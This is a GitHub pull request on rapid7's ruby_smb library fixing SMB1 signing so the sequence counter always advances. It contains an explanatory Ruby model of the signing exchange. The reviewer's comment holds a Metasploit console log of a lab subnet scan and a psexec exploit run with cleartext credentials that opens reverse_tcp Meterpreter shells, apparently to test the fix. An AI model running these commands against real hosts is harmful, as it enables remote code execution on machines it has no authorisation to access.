rapid7 / ruby_smb

A native Ruby implementation of the SMB Protocol Family

Always track sequence counter regardless of having a session key present #230

Closed adfoster-r7 closed 2 years ago

adfoster-r7 commented 2 years ago

According to the SMB specification, the signing example shows that we should always increment the sequence counter when interacting with the server - regardless of having a session_key present just yet:

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb/8b80e60b-7514-442b-baf4-eb785d0b0e2c

  1. The client builds an SMB_COM_SESSION_SETUP_ANDX request SMB and sends it to the server. ... At this stage, the SessionKey is not yet available. ... After the packet is sent by the client, the sequence number is incremented to 1, which is the expected sequence number for the response packet from the server.

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb/8b80e60b-7514-442b-baf4-eb785d0b0e2c#:~:text=The%20client%20builds%20an%20SMB_COM_SESSION_SETUP_ANDX%20request%20SMB%20and%20sends%20it%20to%20the%20server.
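The following is an added example, not ruby_smb's code and not part of the pull request: a small Ruby model of the SMB1 signing sequence counter from the MS-SMB example quoted above, written to show why the counter has to advance even before a session key exists. The class, method and constant names (`Smb1SigningSequence`, `sign_outgoing`, `verify_incoming`, `run_exchange`) are hypothetical. The signature computation follows the MS-CIFS description (sequence number as a 32-bit little-endian value plus four zero bytes written into the 8-byte SecurityFeatures field at header offset 14, then the first 8 bytes of MD5 over the key concatenated with the message); the 16-byte key and the message bodies are constructed stand-ins, and in a real NTLM session the MAC key is the session key followed by the NTLM response rather than a bare session key.

```ruby
require 'digest'

# Hypothetical model of one side of an SMB1 signed connection.
# SecurityFeatures is the 8-byte field at offset 14 of the 32-byte SMB1 header.
class Smb1SigningSequence
  SIGNATURE_OFFSET = 14
  SIGNATURE_SIZE   = 8

  attr_reader :sequence_counter
  attr_accessor :session_key   # nil until SESSION_SETUP_ANDX completes

  # count_without_key: true  -> always track the counter (the behaviour this PR adopts)
  #                    false -> only track once a session key exists (the old behaviour)
  def initialize(count_without_key: true)
    @sequence_counter = 0
    @session_key = nil
    @count_without_key = count_without_key
  end

  # Sign the outgoing message if a key is present, then advance the counter.
  def sign_outgoing(message)
    message = message.b
    if @session_key
      message[SIGNATURE_OFFSET, SIGNATURE_SIZE] = signature_for(message, @sequence_counter)
    end
    advance
    message
  end

  # Verify an incoming message if a key is present, then advance the counter.
  # Returns true for unsigned traffic accepted before a key exists, or when the MAC matches.
  def verify_incoming(message)
    ok = true
    if @session_key
      ok = message.b[SIGNATURE_OFFSET, SIGNATURE_SIZE] == signature_for(message, @sequence_counter)
    end
    advance
    ok
  end

  # MS-CIFS style signature: write the sequence number (32-bit LE plus four zero
  # bytes) into SecurityFeatures, then take the first 8 bytes of MD5(key || message).
  def signature_for(message, seq)
    m = message.b
    m[SIGNATURE_OFFSET, SIGNATURE_SIZE] = [seq, 0].pack('V2')
    Digest::MD5.digest(@session_key + m)[0, SIGNATURE_SIZE]
  end

  private

  def advance
    @sequence_counter += 1 if @session_key || @count_without_key
  end
end

SMB_COM_SESSION_SETUP_ANDX = 0x73
SMB_COM_TREE_CONNECT_ANDX  = 0x75

# Constructed 32-byte SMB1 header (magic, command, zero-filled remainder) plus a body.
def smb1_message(command, body = '')
  "\xFFSMB".b + [command].pack('C') + ("\x00" * 27).b + body.b
end

# Plays the spec example: SESSION_SETUP_ANDX request (no key yet), the signed
# response (key now known), then a signed TREE_CONNECT_ANDX request. The server
# side always tracks the counter; the client side is configurable.
def run_exchange(count_without_key:)
  session_key = ("\x11" * 16).b                       # constructed stand-in for the real key
  client = Smb1SigningSequence.new(count_without_key: count_without_key)
  server = Smb1SigningSequence.new(count_without_key: true)

  # 1. Client sends SESSION_SETUP_ANDX unsigned; sequence 0 belongs to this request.
  req = client.sign_outgoing(smb1_message(SMB_COM_SESSION_SETUP_ANDX, 'auth blob'))
  server.verify_incoming(req)
  server.session_key = session_key                    # server derives the key from the auth blob

  # 2. Server signs its response with sequence 1.
  resp = server.sign_outgoing(smb1_message(SMB_COM_SESSION_SETUP_ANDX, 'ok'))

  # 3. Client now has the key and must verify the response with sequence 1.
  client.session_key = session_key
  setup_ok = client.verify_incoming(resp)

  # 4. The first signed client request must carry sequence 2.
  tree = client.sign_outgoing(smb1_message(SMB_COM_TREE_CONNECT_ANDX, '\\\\srv\\IPC$'))
  tree_ok = server.verify_incoming(tree)

  { session_setup_verified: setup_ok, tree_connect_verified: tree_ok,
    client_counter: client.sequence_counter, server_counter: server.sequence_counter }
end
```

With `count_without_key: true` both sides stay in step and every signature verifies; with `count_without_key: false` the client is one behind from the session setup response onwards, so the first response it tries to verify and the first request it signs both fail even though the key is correct.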

smcintyre-r7 commented 2 years ago

LGTM, tested with psexec and smb_login from Metasploit.

Testing Output

```
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.159.1:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:required) (guid:{9cf46501-404c-4fd9-9708-aa9b1616c591}) (authentication domain:TOR)
[*] 192.168.159.11:445    - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:9m 18s) (guid:{dffa5c50-e93d-4753-a4fc-0c698706f4db}) (authentication domain:WIN-9NSI4A6AIHJ)
[+] 192.168.159.11:445    - Host is running Windows 7 Professional SP1 (build:7601) (name:WIN-9NSI4A6AIHJ) (workgroup:WORKGROUP)
[*] 192.168.159.0/24:     - Scanned  26 of 256 hosts (10% complete)
[*] 192.168.159.0/24:     - Scanned  52 of 256 hosts (20% complete)
[*] 192.168.159.0/24:     - Scanned  77 of 256 hosts (30% complete)
[*] 192.168.159.96:445    - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:) (encryption capabilities:AES-128-GCM) (signatures:required) (guid:{696d9eef-5586-401c-accb-133d43cb333e}) (authentication domain:MSFLAB)
^C[*] 192.168.159.0/24:     - Caught interrupt from the console...
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) > use exploit/windows/smb/psexec show o
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                                 yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser                                no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.159.11
RHOSTS => 192.168.159.11
msf6 exploit(windows/smb/psexec) > set SMBUser smcintyre
SMBUser => smcintyre
msf6 exploit(windows/smb/psexec) > set SMBPass Password1!
SMBPass => Password1!
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.250.134:4444
[*] 192.168.159.11:445 - Connecting to the server...
[*] 192.168.159.11:445 - Authenticating to 192.168.159.11:445 as user 'smcintyre'...
[*] 192.168.159.11:445 - Selecting PowerShell target
[*] 192.168.159.11:445 - Executing the payload...
[+] 192.168.159.11:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.250.237
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.237:63414) at 2022-06-15 09:58:26 -0400

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.11 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > set SMB::ProtocolVersion 1
SMB::ProtocolVersion => 1
msf6 exploit(windows/smb/psexec) > exploit
msf6 exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444
[*] 192.168.159.11:445 - Connecting to the server...
[*] 192.168.159.11:445 - Authenticating to 192.168.159.11:445 as user 'smcintyre'...
[*] 192.168.159.11:445 - Selecting PowerShell target
[*] 192.168.159.11:445 - Executing the payload...
[+] 192.168.159.11:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.250.237
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:56247) at 2022-06-15 09:59:53 -0400

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.11 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) >
```